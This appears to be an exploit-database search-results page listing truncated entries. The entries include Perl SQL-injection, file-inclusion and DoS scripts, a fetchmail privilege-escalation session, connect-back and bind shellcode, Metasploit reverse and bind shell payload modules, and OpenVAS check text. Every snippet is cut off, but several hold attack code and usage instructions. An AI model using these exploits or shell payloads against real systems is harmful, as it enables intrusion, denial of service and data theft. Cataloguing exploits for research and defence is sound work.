878 matches found
Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit (x86)
Exploit for macOS platform in category local exploits =============================================================== Mac OS X kevin-finisterres-mac-mini: kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234 Enter password for email protected: sh-2.05b$ id uid=501kfinisterre...
newscientist.txt
We from Black Box Magazine - Underground Inet-Security Research -- http://bboxnet.mine.nu found Cross Site Scripting Vuln in http://www.newscientist.com/ Write this example in Search: "...
radlance.txt
Discovered And Coded By Mr.CrackerZ Exploit Code !/usr/bin/perl Discovered and coded by Mr.CrackerZ Security Team Contact me [email protected] Usage: radlance.pl Google: Powered by: RadLance Gold v7 Tested Under RadLance Gold v7 Local Inclusion Exploit Example:...
zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS
Exploit for linux platform in category dos / poc =================================================== zawhttpd new PeerAddr = $ARGV0, PeerPort = $ARGV1, Proto = "TCP" print "Attempting to kill zawhttpd at $ARGV0:$ARGV1 ..."; print $socket "GET \\\\\\\\\\ HTTP/1.0\r\n\r\n"; close$socket;...
linux/amd64 - connect-back semi-stealth shellcode 88+ bytes
linux/amd64 connect-back semi-stealth shellcode 88+ bytes. Shellcode exploit for linamd64 platform include include include include include include include / usual rant here.. this is just a doodle.. i was curious about the amd64 and since i dont think a simple exec /bin/sh is worth releasing i gi...
FlexBB 0.5.5 - '/inc/start.php?_COOKIE' SQL Bypass
!/usr/bin/perl -w FlexBB : DONT FORGET TO DO YOUR CONFIG !! DONT FORGET TO DO YOUR CONFIG !! DONT FORGET TO DO YOUR CONFIG !! use IO::Socket; -- Start -- $host = "127.0.0.1"; $path = "/flexbb/"; -- END -- $host :- The Host Name Without http:// | exm. www.vic.com $path :- FlexBB Dir On Server | ex...
CVE-2006-1240
Buffer overflow in inetserver.cpp in 1 fbinetserver and 2 fbserver in Firebird 1.5.2.4731 allows local users to gain privileges via a long value of the -p argument...
CilemNews System 1.1 - yazdir.asp haber_id SQL Injection
CilemNews System 1.1 - yazdir.asp haberid SQL Injection !/usr/bin/perl Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Usage: cilem.pl Original Advisory: http://www.nukedx.com/?viewdoc=10 googledork inurl:yazdir.asp?haberid= 2.140...
D2-Shoutbox 4.2 IPB Mod - load SQL Injection
D2-Shoutbox 4.2 IPB Mod - load SQL Injection !/usr/bin/perl | | | \ | | |/ D2-Shoutbox 4.2IPB Mod=SQL injection Created By SkOd SED security Team http://www.sed-team.be [email protected] ISRAEL google: "Powered By D2-Shoutbox 4.2" use IO::Socket; $host = $ARGV0; $user = $ARGV2; $uid = $ARGV3; $pi...
D2-Shoutbox 4.2 IPB Mod (load) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl | | | \ | | |/ D2-Shoutbox 4.2IPB Mod=SQL injection Created By SkOd SED security Team http://www.sed-team.be [email protected] ISRAEL google: "Powered By D2-Shoutbox 4.2" use IO::Socket; $host = $ARGV0; $user = $ARGV2; $uid = $ARGV3; $pid = $ARGV4...
WorldMail-3.0.pl.txt
Eudora WorldMail 3.0 Windows 2000 Remote System Exploit November 2005 Tested on Windows 2000 Server SP4 infoATcom-winner.com http://www.com-winner.com http://www.com-winner.com/CWCOM/cwc-index/ use IO::Socket::INET; use strict; win32bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub...
Phpclanwebsite 1.23.1 - SQL Injection
!perl Phpclanwebsite 1.23.1 SQL injection exploit by matrixkiller Greets to all omega-team membersand specially to EcLiPsE and also to h4cky0uh4cky0u.org, Alpha-Fan, Chameleon and all my friends The exploit was tested on phpclan's website and it worked + my local server and on ra4ev.com But on...
Unix Command Shell, Reverse TCP (via Perl)
Creates an interactive shell via perl This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 234 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def initializeinfo...
Unix Command Shell, Bind TCP (via Perl)
Listen for a connection and spawn a command shell via perl This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 240 include Msf::Payload::Single include Msf::Sessions::CommandShellOptio...
ie_xp_pfv_metafile.pm.txt
This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core Framework dual GPLv2 and Artistic. The latest version of the...
Microsoft Windows XP2003 - Metafile Escape() Code Execution (Metasploit)
Microsoft Windows XP2003 - Metafile Escape Code Execution Metasploit This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the cor...
Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC
Exploit for unknown platform in category remote exploits ============================================================ Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC ============================================================ Watchfire AppScan QA PoC - Coded by Mariano Nu?ez Di Croc...
Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC
No description provided by source. Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC How to use: 1. Run this script to setup the fake web server. 2. Scan the server with AppScan QA, either in Interactive or Manual mode. 3. If you get an "You are vulnerable!" popup, you should...
redhat Interchange
It seems that SPDX-FileCopyrightText: 2005 Michel Arboi Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only Note: this service is not a web server, but it looks like it for findservice HEAD...
redhat Interchange
It seems that 'Red Hat Interchange' ecommerce and dynamic content management application is running in 'Inet' mode on this port. Versions 4.8.5 and earlier are flawed and may disclose contents of sensitive files to attackers. OpenVAS neither checked Interchange version nor tried to exploit the...